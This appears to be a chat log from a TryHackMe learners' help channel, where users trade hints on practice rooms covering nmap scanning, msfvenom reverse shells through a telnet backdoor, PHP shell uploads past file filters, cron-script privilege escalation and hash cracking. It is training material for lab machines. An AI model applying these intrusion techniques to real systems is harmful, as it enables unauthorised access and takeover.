I did -p- for all ports and it returned "8012" as the open port. The second question says "Now re-run the Nmap scan, without the -p- tag, how many ports show up as open?" 0 showed up as open. Now, the question I have the issue with is "Based on the title returned to us, what do we think this port could be used for?"

dim sequoia
glacial gust
dim sequoia
#

That's the problem I have....Its now showing me anything useful for the 6th and 7th question

glacial gust
#

after port 8012, is there any output data with it

dim sequoia
#

Nope

white salmon
#

try the -vv switch for verbosity level 2

dim sequoia
#

I'll try that. Thanks

#

this finally worked "nmap -n -p8012 -sV [IP]"

white salmon
#

The -A switch includes version scanning I didn't know it'd be different output.

#

Very cool.

dim sequoia
#

I didn't know that too. I guess we learn everyday.

Thanks a lot

glacial gust
#

the nmap room covers a lot the switches

dim sequoia
#

I'll make sure to check that out

frail palm
#

Hello all, having an issue with Burp Suite Module Task 8. The error after sending the HTTP POST to the repeater and intruder, what is the error you get when you change the user name and password to '

#

I tried a few different things and cannot get the right answer

white salmon
tropic garden
#

Hi folks, would appreciate getting a nudge on Cyborg room. I've run the nmap scan and identified 2 services running - ssh and http. I'm trying to exploit the first one through a user enumeration vulnerability (for about 2 days now), but I'm not sure if it is my wordlist or the vulnerability I'm trying to exploit is the issue.

tropic garden
#

Didn't want to look at write ups first as I'm trying to develop the mindset

ripe hedge
#

what do you have so far?

dry gate
#

Complete Beginner Path: Web Hacking Fundamentals: Web Fundamentals...

I'm on the mini ctf at the end and I'm not quite sure what to do.

I've made notes on the content of the room and I feel like I understand it pretty well but when it comes to solving the ctf, I'm not sure what to do. I got that to get the first flag I had to do: curl http:// [IP]/ctf/get.

I tried using -X POST to define the kind of request.

I remember reading that the body of the http request didn't matter in GET requests but they do with POST. However, I'm not quite sure I understand how this works.

Any help would be greatly appreciated :)

#

ok woah I misread the question wow.

#

Ok got it. That was silly πŸ˜‚

lavish solstice
#

In Complete Beginner Path: Network Services: Exploiting SMB
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]".

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server

I'm stuck at this part, don't know which server I'm supposed to log in into

ripe hedge
#

the target vm

#

ah ok you grabbed the key, not use it πŸ™‚

#

same VM should also have the service you need

#

normally you already portscanned the machine

glass vine
#

hi all, i trying room of SESH Birthday CTF
i'm hitting the wall to get the username, i have found the password in the totallytopsecret.pdf

however, i'm stuck ---- to get the username

#

am i in the right path, as the hint mentioned stored address or phone number

frail palm
frail palm
#

Stuck on Burp Suite Task 10, i do not have any from Juice Shop with the set-cookie in the header

#

Tried running the payload again but still no response to proceed

white salmon
frail palm
#

Not today i started over

white salmon
#

do you know the name of the structure where burp suite holds the requests from browsing/spidering a web application? That's my hint in conjunction with the happy path.

frail palm
#

The http history tab

empty roost
#

Trying privesc on retro… should wesng or windows-exploit-suggester help here? Winpeas seems useless for this

white salmon
frail palm
white salmon
#

There are lots of app services that provide this like Google is a big one that provides this

frail palm
#

Maps

white salmon
#

Correct!

#

So in Task 7 you'll find this word being used and you'll know where to look.

#

Task 7 tells you where to look for you to complete Task 10. It's not the only place where you could look as you are looking in the History tab too but it's the best place I think.

#

And don't forget to check the responses and not the requests for the Set-Cookie header since it is a http response header.

green minnowBOT
#

Gave +1 Rep to @oblique vector

frail palm
#

@white salmon so I sent it to sequencer and running it. Pause it at analyze now. Then burp suite closes down

white salmon
#

I guess you'll have to browse the happy path again

frail palm
#

I got it! Thank you for the hints!

white salmon
modern patio
#

Hey there, I'm working on the network service room and I'm stuck on the telnet enumeration task, it's supposed to have a port open, but scanned the target vm using -sS -sT -sA -sN -sF -sX and -sU and they all say that all ports are closed. Am I being dumb or am I being dumb?

white salmon
dim sequoia
modern patio
#

thanks! will try

#

Thanks, seems I was being dumb πŸ˜†

dry gate
#

good evening people :)

modern patio
#

Alright, I'm still stuck on that network service room but now on the telnet exploitation. I have the attack box listening with nc and used the command that was given in the tasks text and prefixed it with .RUN still can't seem get a reverse shell going.

#

only thing I didn't do exactly like the command is I used the eth0 IP instead of tun0 since I'm using the attack box and I didn't have a tun0 in ifconfig

white salmon
#

Oh yeah you do sorryh

modern patio
#

yup used nc lvp 4444

white salmon
#

The payload is like starts with mkfifo right?

modern patio
#

I'd guess the issue is with the other command, since I'm not getting the message with the payload

#

I don't have that part

#

I know I should but I don't know what I done wrong

white salmon
#

that whole string that msfvenom spit out onto the terminal starting with mkfifo that whole thing you pasted into the backdoor service input and prefixed with .RUN [exploit]?

modern patio
#

ok

#

so I missed something

#

I used .RUN msfvenom ...

#

so that's wrong I guess?

white salmon
#

That's incorrect. You should re-read this part:

modern patio
#

So I should run it on my local machine instead

white salmon
#

try it out

#

Notice how the text talks about two different things:

**We're going to generate **a reverse shell payload using msfvenom
and at the bottom:
What word does **the generated payload **start with?

#

msfvenom here is the tool that will be generating the payload. The payload being a reverse shell that we will be running as a system command on the target machine using this open telnet connection.

modern patio
#

Ohhhhhhhhh

#

Thanks @white salmon it ended up working!

green minnowBOT
#

Gave +1 Rep to @oblique vector

celest silo
#

What is the name used to identify the device responsible for sending data to another network?

celest silo
#

Introtolan

#

It should be router but not accepting the answer

white salmon
#

That's my hint.

celest silo
#

What can it be then πŸ€”

tough rapids
celest silo
#

It says transmitter

#

But it's wrong

white salmon
#

So read through that information again now that you've read the question and I think you might see it there yourself.

#

Another tip for you when answering questions is to match the asterisks and if your answer is letters short or has more letters than asterisks then it's not the answer.

celest silo
#

Umm ok lemme try to figure it out

white salmon
#

Sure! And remember to take your time as you are learning the material. It's okay to read things again and again. Good luck!

celest silo
#

tq brovi

tough rapids
celest silo
#

yup hold

#

introduction to lan

#

A Primer on Subnetting

tough rapids
celest silo
#

last question

tough rapids
#

Yea I just spinned up thm saw that

celest silo
tough rapids
#

read the given context for the specific

#

The answer is there :)

celest silo
#

oh ok lemme find out

celest silo
#

got the ans

white salmon
celest silo
#

thanks brovi

mystic sand
ashen matrix
#

Maybe you should try to find 'script' and then see if you can read it

mystic sand
#

There's a bunch of gibberish in there, but I just tricked the answer tolerance on the next question, presenting me with the needed command after reloading the page πŸ™ƒ the answer is ||ls|| and I really don't know why or how I would have known that because afaic, ||ls|| doesn't do what's seen in the screenshot I sent. 0.o

ripe hedge
#

though if it's an ELF file you can probably try to disassemble it

#

and you'd probably want to use ./script

mystic sand
ripe hedge
#

that happens

#

it's a silly mistake that happens a lot

#

you're basically going to abuse that same mistake that the dev made

mystic sand
#

It also doesn't really help, that script is an actual command (which I just found out), which is why I thought the file "script" was doing sth else πŸ€¦β€β™‚οΈ

#

Well, thank you

ripe hedge
#

np

#

it's a command on that box πŸ™‚

mystic sand
#

Yeah, that's what I meant

copper blade
#

Hello guys!

Please help. I've been struggling on downloading the .ps1 file on the remote machine via jerkins in Alfred room...

This is the error I get always:weary: :weary:

copper blade
ashen matrix
mortal abyss
#

I'm working on Chill Hack. I've gotten my own public key into the authorized_keys for one of the users, but I'm hitting a wall on privesc. Is there anyone here that's done it that could be so kind as to PM me the slightest whiff of a hint as to which direction I should be looking?

light tundra
#

Hello folks! I'm on Upload Vulnerabilities, Task 9, Magic Numbersβ€” I was able to bypass the filter with the Magic Number trick but when they say I'll need to activate the shell by "going directly to its url." I go directly to the URL in browser, the file downloads, but I'm not seeing anything on my listener. Does this mean something isn't right in the script, or I'm performing a step wrong? Or is there another methodology I need to take? Do I need to edit my script to...activate? idk Β―_(ツ)_/Β―

light tundra
#

do I have to do as bind shell 😦

versed void
#

Hey, How can I get machine credentials?

ripe hedge
versed void
#

I am in room Basic pentesting and I want to log in with ssh. But I dio not know password

ripe hedge
winter grove
#

Hey, i am doing attacktive directory room and really stuck on kerbrute tool

#

as i can't get it with go command

#

installed go with step by step and i can get hello world as it was from examples to verify go function

#

nothing happens

#

nevermind πŸ˜„

glass vine
#

Hi all, i'm stuck with the room SESH Birthday task 2 question 9, managed to get and decode password from the totallytopsecret.pdf, however not sure am i looking in the correct path at the store address and phone number to get the username

appreciate if someone can give a little hint

ripe hedge
winter grove
ripe hedge
#

ok then

ashen matrix
#

You need to search for it. Gobuster has a switch that allows for searching with custom extensions on the end (php, txt, etc) use that

#

Also try not to show answers when posting questions. You do show an answer in that image

white salmon
#

Oh yeah my bad, thanks though! I'll try using Gobuster, I used FFUF

ashen matrix
#

FFUF probably has a switch as well

#

I have never used FFUF tho, lots of tools available that do this

white salmon
#

Oh yeah it does have an extension switch, I was overthinking it and was thinking I'd have to use multiple FUZZes, I'll try using the extension switch, that should do it

#

Thanks again for the help!

copper blade
# ashen matrix Rooms can't connect to the Internet. Looks like you're trying to download someth...

Thanks bro, I thought of this as well since there are not in same LAN but I've done something like this before and it worked.. I used it to transfer a file to attackbox I was using then..

Now, I setup a python server but it is only server my directory to 0.0.0.0

Is there a way I can start a server with a specific network interface?
If possible, I will just start the server with my thm VPN ip

green minnowBOT
#

Gave +1 Rep to @ashen matrix

ripe hedge
#

0.0.0.0 means everyone can connect

ashen matrix
light tundra
ripe hedge
#

sounds about right

#

try it with a simple backdoor and see if that works

light tundra
#

I'll do pentestmonkey without any Magic Number change

#

is that how I'm supposed to access the file? Directly to its path in the browser window?

ripe hedge
#

yup

light tundra
#

I may have figured it out...

#

no.

#

no i haven't

copper blade
green minnowBOT
#

Gave +1 Rep to @ashen matrix

light tundra
#

@ripe hedge After I've changed the Magic Number, is the extension supposed to sit on top of the body of the text like this? I submitted, went to the URL but it just had the command echoed out on the browser...

WHAT AM I MISSING (β•―Β°β–‘Β°οΌ‰β•―οΈ΅ ┻━┻

ripe hedge
#

you'll need to execute some actual php though

light tundra
#

omfg

ripe hedge
#

the parser's probably going mad now

light tundra
#

πŸ˜‘

light tundra
#

GOT IT

light tundra
green minnowBOT
#

Gave +1 Rep to @ripe hedge

ripe hedge
#

glad you got it working

#

don't worry though, sometimes your brain just shuts down and the lizard takes over

dire otter
#

I'm really stuck at Pickle Rick ctf

#

I have been enumerating for the last 2 hours and only found /server-status/ lmao

#

I have found robot.txt and the username, and advice on how to proceed?

ashen matrix
dire otter
#

You mean that the medium word list isn't enough?

#

Ok I'll give it a shot

#

Wait the directory-list-2.3-medium is the biggest one lmao

ashen matrix
#

there are bigger wordlists. the hint is in the word. If you are using Kali Linux you should have this wordlist already

dire otter
#

I use kali

#

It's in the dirbuster directory right?

ashen matrix
#

nope. the wordlist I used is in the wordlist area. from there maybe try using the 'find' binary to look for it. the name of it is big

dire otter
#

Ohhh

#

I see

#

So i have been using the wrong wordlist

ashen matrix
#

i wouldnt say wrong

#

you just need to move to a bigger wordlist if a smaller one is not hitting anything

dire otter
#

Ok now i got something

#

Thanks @ashen matrix

green minnowBOT
#

Gave +1 Rep to @ashen matrix

ashen matrix
#

@dire otter also note, sometimes they are just rabbit holes there to annoy and no matter how large a wordlist is, you won't find anything

#

this isnt the case to be clear

dire otter
#

Noted

#

Other than that, no luck lmao

ashen matrix
#

There is more to find. Big.txt found it for me

dire otter
#

Yeah i found nothing

ashen matrix
#

Mind if I DM you?

dire otter
#

Nvm found it

#

Finally

#

Thanks @ashen matrix

green minnowBOT
#

Gave +1 Rep to @ashen matrix

dire otter
#

Ffs found the rabbit hole

rugged flame
#

Basic Pentesting how to brute-force credentials? i wanted to use hydra, but don't know where are wordlist with logins.

left thunder
white salmon
frail palm
#

Looking for some help, stuck on SMB Task4 . I cannot get current user correct that im currently connected as. Cannot download the file locally

#

Got the user

left thunder
frail palm
#

No stuck at the final step of task 4

frail palm
rugged flame
mental quarry
rugged flame
mental quarry
rugged flame
green minnowBOT
#

Gave +1 Rep to @mental quarry

mental quarry
#

No problem πŸ™‚

steady fern
#

In CC: Pen Testing task 4, I can't seem to get gobuster running on the kali browser machine. I've tried searching the system using find. I've tried installing it using sudo apt-get install gobuster, I don't know if the kali machine uses go or if I should try the attackbox. Any suggestions would be greatly appreciated. Thanks in advance.

spice shard
#

You installed gobuster on kali? What does the output look like when you run gobuster? And also have you installed golang on kali?

steady fern
#

I have tried but it wouldn't let me, and I haven't installed golang yet. I will try

#

I'm getting similar errors, ie E: Failed to fetch..., when trying to install gobuster

spice shard
#

try it without sudo

#

and you don't need sudo there because you are already superuser

steady fern
#

I got the same messages

#

basically a bunch of 404 errors on IP: 192.99.200.113 80

spice shard
#

This might be the problem from your kali repositories.. have a look at this https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/

#

And, are your package upgraded and kali up-to-date?

steady fern
#

I'm using the in browser version. I made the mistake of accidentally upgrading it and I basically ran out of time before the box was usable again.

#

by "in browser" the one provided by tryhackme

spice shard
#

Ohh the Attackbox

steady fern
#

right, but I'm differentiating it because it isn't the "attackbox" but the kali box

#

but yes

spice shard
#

Well, I haven't tried to installed anything on attackbox, personally. So am not sure if I can provide any solutions. But imo, attackbox comes with pre-installation of tools and there might not need to install the tools by the user. See if you locate the tool with locate command

steady fern
#

πŸ˜• turns up nothing. That being said, maybe I should just jump on the regular old attackbox. And if that doesn't work, I should probably spin up a kali vm. I really appreciate your help

steady fern
#

gobuster is available on the Attackbox. Probably should have checked there first. Thank you hellfire0x01

ember cosmos
#

Hints for "Startup"

#

Can anyone give me?

hearty widget
#

@ember cosmos What question?

ember cosmos
#

Any hint for Privilege Escalation?

hearty widget
#

@ember cosmos Look for a file lennie owns that you can adjust.

ember cosmos
hearty widget
#

@ember cosmos you got it.

ember cosmos
hearty widget
#

Now find a way to use that file to get you root access.

#

you don't need to. if you check crontab that might help you understand.

ember cosmos
#

The crontab is not having any script scheduled to be run

hearty widget
#

@ember cosmos cron is running the planner.sh file often. Reading that file it also runs the print.sh file which you can edit.

ember cosmos
#

Check the crontab

#

That's what I'm saying

ember cosmos
hearty widget
#

@ember cosmos Sorry, pspy shows this running each minute.

#

principle is still the same. Edit the file and get root.

ember cosmos
#

Thanks

#

It worked

fallow ibex
#

hey i'm doing the CC: pen Testing and I can't find the answer for the 6th question of the 5th Task. Could someone help me ?

#

I was thinking about -mutate

white salmon
#

Hi, I'm stuck in Sweettooth Inc. room on the Privilege escalation step. I have run linux-smart-enumeration (lse.sh -l 2) and I can't find anything that I can use from there. I'm definitely missing something 😦 Any hints on what I should look for next?

left thunder
white salmon
#

@left thunder thanks. I didn't know that. I'll go check there

green minnowBOT
#

Gave +1 Rep to @left thunder

left thunder
fallow ibex
hearty widget
#

@fallow ibex Copy the question into google, answer is in the first response. (you don't even need to click into it)

fallow ibex
green minnowBOT
#

Gave +1 Rep to @hearty widget

median grail
#

Room Investigating Windows :
i don't understand how too know what tool was used to get Windows passwords..

hearty widget
#

@median grail which task/question?

median grail
#

there only is one task in this room
and the question is What tool was used to get Windows passwords?

hearty widget
#

@median grail Start with the task scheduler.

median grail
#

ok

#

I must be missing something

hearty widget
#

You're looking for a task. Maybe the actions of that task will help you.

median grail
#

i know, but i don't find what is wrong in the list of tasks

#

I was not looking in the right place

#

sorru πŸ˜…

hearty widget
#

@median grail you figured it out?

median grail
hearty widget
#

super

white salmon
#

aloooooooooooooooooooooooo

#

i've decrypted the hash in the web page source code, but now i'm stucked

#

someone of you could give me a little hint?

stable island
#

Buffer Overflow prep, I completed OVERFLOW1 and got a shell, just completed OVERFLOW2. However netcat isnt picking up a shell. Is that by design, or am I doing something wrong?

halcyon sphinx
#

In the network services room on Task 7: Exploiting Telnet I'm not clear on which lhost IP and lport values I should be using. I've tried setting lhost as attacking machine IP and lport values as 4444 but nothing ever happens

#

Something has happened b/c now when I telnet in I am not getting the standard welcome message which allows you to run .HELP or .RUN etc.

vagrant dove
vagrant dove
stray ocean
#

Hey, im struggeling with network services Task 6. where i have to scan the machine and find the open port. When i scan the first 10.000 ports with "nmap -p0-10000 'ip' -Pn" nmap says that all 10.000 ports are filtered. Did i miss something?

left thunder
proud needle
left thunder
stray ocean
#

Okay, I'll try it again tomorrow, thanks

spice shard
#

Room: startup. There is file in ||incident|| directory. Can that be transfer on our machine? Because I'm trying to transfer it but it requires password which I don't have. I am a ||www-data|| user. Any nudge?

halcyon sphinx
left thunder
copper blade
#

Hello all.

Please help your homeboy

I'm having issues getting a reverse shell via msf.

I created the .exe payload from the msfvenom command in the first command in the picture above and I got it transferred to the remote machine with the second command...

I fired msf and set all my required options making sure the parameters are same with what I set up in the .exe payload above...

Once I start the process, I just didn't get any shell:sob: :sob: :sob: :sob:

copper blade
vagrant dove
vagrant dove
left thunder
#

@bold beacon So what I still don't understand is what exactly the issue is? You are not getting the flag, or you can't find the correct page for this question?

bold beacon
#

im getting the flag

#

im not getting the flat

#

flag*

left thunder
bold beacon
left thunder
languid harness
#

Hello, I'm working on the bolt room and I can't figure out the version. The msfconsole used 3.7.0 and I've tried a few different version numbers. Any idea how I can get the version number from the server?

#

Could even be the first word I'm using. I'm kinda stumped. DM can be sent. Thank you.

silver tundra
#

someone know what is answer on Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?

#

because it can't show me the answer

glacial gust
#

what browser are you using

silver tundra
#

chrome

#

@glacial gust

graceful pewter
#

hello I just finish the linux backdoor room but I have just one question about pam_unix.so backdoor, The new password added is "0xmitusrugi" ? and if i want change him I need to replace the string ?

glacial gust
silver tundra
#

okay

proud needle
halcyon sphinx
halcyon sphinx
modest pagoda
#

So I am trying to complete " Sweettooth Inc." room and I can't find what I need to do to become root. Pls help

twin mesa
#

Hi, i was doing steel mountain & got this kind of weird thing, whenever i try to execute any powershell cmd it just dosen't output anything, is this a bug or just kind of windows thing(i'm not very good with windows boxes)

rain latch
# left thunder ls is a linux command

PowerShell should accept ls as well (maybe that's depending on the version, not sure about that).
Though I agree @twin mesa you should try native windows commands that you can also use in a normal command prompt

twin mesa
rain latch
twin mesa
#

Maybe the shell is not stable

ripe hedge
#

this is a possibility

fossil cobalt
#

The third task on this page has a problem. I am not able to access the THM{...} code.

#

What should I do?

fossil cobalt
white salmon
#

Did you enter the correct MAC address ?

#

Because I just tried and it works

fossil cobalt
#

yeah. It was replication, right?

white salmon
#

What browser you're using ?

fossil cobalt
#

I mean spoofing, by copy pasting that other mac... I will check my notif settings.

white salmon
#

Yeah it is

#

Are you doing the room on Google Chrome, Firefox or an other ?

#

I know that sometimes bugs happen with Chrome on interactive site

left thunder
fossil cobalt
#

I am using Edge browser

#

okay

white salmon
#

Try with Firefox maybe

fossil cobalt
#

Notifs and most settings including cookies are allowed.

fossil cobalt
fossil cobalt
left thunder
fossil cobalt
#

Oh yeah... sorry, did not notice.

#

thank you sir

left thunder
fossil cobalt
#

yess!

left thunder
#

Great πŸ™‚

fossil cobalt
#

May I ask something in dm?

left thunder
#

Just one more thing if that's happening again. You can open the simulator site as usally in splitscreen, right click that page and inspect, there you will find the link for it in the html code

left thunder
green minnowBOT
#

Gave +1 Rep to @left thunder

fossil cobalt
#

ow, nice!

fresh zephyr
#

Vulnversity task5 priv esc: I managed to get a shell as www-data, and am trying to transfer an enum script from the attack box to the target machine via python3 - m http.server 8080 (while in folder of enum scripts). When I try to wget from target machine as wwwdata, I get a permission denied - cannot write to (name of enum script). Any hint if I'm doing something wrong or if the low priv wwwdata is in general not allowed to do this kind of wget download? Thanks a lot!

fresh zephyr
pine oar
#

hello all

#

I'm in the middle of the network services lesson and can't get the reverse shell to work off msfvenom - p cmd/unix/reverse_netcat ....

#

any ideas I can see the ping response but the netcat listener is getting nothing

left thunder
# pine oar hello all

Please be more detailed, what task, are you on a VM, the attackbox or just your own linux machine. In case it could be helpful, a screenshot.

pine oar
#

task 7 last part. attack box .

#

forgot to mark spoilers

left thunder
pine oar
#

ok I got it thanks. Misunderstood that part thanks

left thunder
pine oar
#

Thanks for the help

knotty heath
#

Hi guys, it's about the room https://tryhackme.com/room/webenumerationv2. Actually it's about gobuster and the -x flag. Scanning the first time and adding php to the x-flag doesn't show any files. If I dirscan the virtualhost and add txt to the dir flag it shows the flag. Any explanation why it doesnt work on webenum.thm but it works on products.webenmum.thm

ashen matrix
ember cosmos
#

Need Help With PrivEsc in "ChillHack"

#

Anyone available?

vivid mortar
#

I am in the enumerating telnet room and I need to run an nmap scan to find the open port and a when I run this nmap -sT IP -vv it says all ports are closed due to conn-refused

left thunder
lapis jolt
#

Hi All, I'm on chillhack (easy) and have shell as www-data but I don't know what to do next. I see the .helpline.sh script but i can't find a way to edit it. Any hits would be great! thanks

lapis jolt
rugged flame
#

whats type of hash in Daily Bugle, or how to crack it?
it seems to take eternity to crack johans password

ember cosmos
lapis jolt
#

@ember cosmos Thanks, I just got a one of the users accounts for ssh. Hopefully about to get root flag. Thanks for replying

white salmon
#

What powershell -c command could we run to manually find out the service name?

#

I found few ways to do that but not the expected one 😦

#

any hint ?

#

did it with powerup and winpeas

white salmon
#

i did both exploitation but not that powershell command

lapis jolt
#

That command is a native powershell command

white salmon
#

yes, i look at couple of them get-service for example

lapis jolt
#

yeah that's the one if i remember correctly

split zealot
#

Could anyone help me with some guidance for the question regarding MTA running a SMTP server ( room Network Services 2 )

white salmon
#

the expected command is 10 characters length followed by space 2 chars space 13 chars

#

get-service is 11 😦

#

i got both flags but got stuck with this question

lapis jolt
#

powershell = 5

#

Get-service = 11

#

ohh

#

you need quotes.

white salmon
#

the question is What powershell -c command could we run to manually find out the service name?

Format is "powershell -c "command here"

lapis jolt
#

powershell -c "get-service"

white salmon
#

that was my though but it's not

#

it's something XXXXXXXXXX XX XXXXXXXXXXXXX

lapis jolt
#

Really? I don't know what the answer is then.. I'm sure is was "get-service"

white salmon
#

yeah ..... got my brain ko with that one

lapis jolt
#

I'm looking at the writeups and the last 3 are saying powershell -c Get-Service

#

or powershell -c "Get-Service"

#

sorry. I'm not sure why that isn't working for you

#

how about 'powershell -c "getservice"'

white salmon
#

man you did my day

#

powershell -c Get-Service

#

I got it right but got confused the way it was asked

#

thank you very much

lapis jolt
dusky needle
#

Hey all, stuck on finding the registry key to question 27 on Investigating windows 3.x...any help would be greatly appreciated

stark pike
#

hi I'm trying to chance the permission of id_rsa, but when i change i still cant connect ssh

#

i got this message

#

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/mnt/nf/tmp/id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "/mnt/nf/tmp/id_rsa": bad permissions
kenobi@10.10.196.163's password:

#

some one can help me ?

rich imp
#

@stark pike use chmod 600 on file that you want ssh to read.

stark pike
#

i used

rich imp
#

did you use 600 or 644 ??

stark pike
#

600

spare fractal
#

@stark pike I think the id_rsa key is encrypted. Use the Tool ssh2john to get the password out of the key.

stark pike
#

ok

#

thx

stark pike
#

i was searching some rsa and i think mine isn't encrypted because it is not like this one

#

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9A447029ABFAC605

WiRuWyOFt8x+eCwBIbRdhpa8pm1YIuBIC1Od73vslxlIcYYkSz8AqCr8k/sus6uY
JHHO6KXjkJCpH/okU9bWGPzQf1cj2jWFf/y7EOSmd1e7RbIA8xWYcAWKPhnvwgnu
z+d6SFSYyj4rkKUvqloclKCblp6M5sCza0YksTzmEJZz/tHWRwHGRG31TvJHiqxQ
n9FpriG5MqZoegcYJgvt+z9rrPNf/jaZZb9ulYwxRn+5nCbWqBilu/Mh5knN608c
uW2UyIlyJ2BpyYrOgqadTkMgIwrwERrbU6LmgVtZXCc6/cACdMwdu6gv17MtfOlM
ytzEZ66aa98EFrFfuFX2LgoOBpi4nAAo3yZ7ISWpWnbnPFzhT89gBAdruh8fo5X4
07gAajsTiJrCW2nZSqBFx4BTAqYP7IcvDv2iAUEg6bfqC2bqpIfjYYcLuy0+YQv4
7uNH9jpT+ZfOY6VK4oG1p+1ieOVothNxcoj0+StUL5i5dQYoW9te8z8+qqswAE9S
aobSSQAUvdNh07XH0TXg+QTsiJGLNMaWmwMBw50WkzJOwN759zuk2b1LbHTpsgbQ
AngfcMfoHOvlhnHZNSbCeDB9SzQwkhLnQ6CktQaQaa5AY/E2ll+/W0Dmr4QEhk7e
z30FE3QqZU7fqxx7esXTMm8z6lvhQNSWRRxsg48rHub+Mq739T+Yi7xK4C9SCzwe
7BYDqp2ekinCf+5OKf3UObNo5Cugb3viapDKHyWulH+dXdxSkLUsgzDoFdFz0H3m
wvc8Qfn0JoVWFxwd1J3B32ZcEIneeGyotrODz5bRmqLv/T7mdM/HRASdonTROEPn
G+Mv65R+MRiAhRIIZO3a8J8eSAzq3AVBuq+gbLabnNvGY2N7KSQ3OBV4XSDYS43R
HuRz2u1GI+sXOr7ZXoQeKbl9qoymRvpppf5kI5IrQBoHGF92GGVLBGJOBg9M/YNc
mLNm9lz2Y+9LmHU6lgq51a7ZfViVFvj+Us63DoSgdyHvC2oj2zWPOFf9Dm4r8aCO
bFS2BFb7UvBd/G2GxnYFKygTHZhPmZ2y/5fBBF5IA/rbQdE5SqC2MJmB0oOgB07v
csqQ5tX8guIxOnh/KHocR/B8Fwf90shrOWoVC0kqGZJN5PrepzPCvoMcJLknC0Q8
eUinaZ0r3UCv7z0gjlz66qWERIMlUczBnLALRf4nVkfP3NHrLinZooGnOh7pkXpm
mg2qTXWnJ+vwfEDb4M0DYOFKa/AxO2wWsCuvc7ZJYvZL2HSWNVl6fRcFTWbrbIr/
ajTfjIclAonNYgGxoDAQKtSSolrNdOquemW79evgdAN/Jtbp5irV3bG0hTcJSIPp
kVBSXe3pslX6BUeOPl9KFT9CNxIjNFZkJ/gUxIV9LOIEcmHCB04iGVFl/KQA2FWD
27fOZbQPG/h4XC6Zm2iGU7ub0FNA2rId1ZRXlE04gYu5g/nmnAOlSbcqcN+xoMmh
L31FphscezkNda/Fw70+y/5buYGSs4tMsUKuiTkZsqSW9j3R9I/7KLHbpKX7fI7n
OURnUxXvDLoXihVQ9kTgTJM6d8pbHYuda4po2IvXWqdnbtHP7Ezz4A==
-----END RSA PRIVATE KEY-----

#

mine there is nothing telling that is encrypted

cursive cairn
#

after changing the permissions, what error does it give now?

#

also what's the output of openssl rsa -in id_rsa -check

#

(don't paste actual key material here if it's not related to a room etc.)

stark pike
#

oh

#

i'm gonna kill myself

trim haven
#

Let's not.. please..

cursive cairn
#

that seems drastic πŸ˜‰

stark pike
#

i change the permission but i wasn't using sudo ssh

#

omg

trim haven
#

It's not alright to joke about and if you weren't joking, I will be happy to point you to plenty of resources on how to help with depression and suicidal ideation. @stark pike

stark pike
#

chill i was joking

trim haven
#

Please don't tell me to chill

#

Especially with the severity of suicide.

stark pike
#

oh sorry

cursive cairn
#

@stark pike namei can be a good tool to check on permissions of a folder/file and all of its parent folders, for future reference.

stark pike
#

i already got the accesses

#

thanks

#

and

#

@trim haven sorry, i know that suicide is drastic

#

i did't mean to

trim haven
#

It's okay :)
Thank you for apologising, I really appreciate that.

vivid mortar
#

I am still trying to run an NMAP scan on this telnet room and have tried all the scan types I know and it keeps saying conn refused or that its blocking out probes or the scan takes forever

trim haven
#

Screenshot your OpenVPN output log?

#

Please

#

And send it here

#

You may need to verify

#

!docs verify

proud scarabBOT
vivid mortar
#

Ive done other rooms also

trim haven
#

What command are you using?
Are you using the AttackBox?

vivid mortar
#

No I'm just using my Linux vm

#

I did nmap -sT IP -vv

#

Also

#

Nmap -sT -p- IP

#

Also -sS

trim haven
#

So, -p- will always take forever

#

If the machine says it's blocking your probes and you add -Pn, it will always take longer, nmap also tells you it will take longer.

#

I would recommend just going in with nmap -T4 -sV machine_ip

#

If it tells you that the probes are being blocked, throw a -Pn on the end, but there's not really much else you can do unless you change the min-rate (or switch to rustscan).

#

Usually Windows machines will require -Pn fyi due to ICMP pings (iirc), they don't always respond to them so nmap presumes the host is down

vivid mortar
#

so the -T4 is some timing thing right?

trim haven
#

Mhm

vivid mortar
#

also thank you for the help

trim haven
#

I'm scanning a room right now and it's taking forever, not really much I can do.

vivid mortar
#

nmap -T4 -sV machine_ip

just ran this one but all 1000 closed so I need to add -p- right

#

to scan all ports

trim haven
#

Yup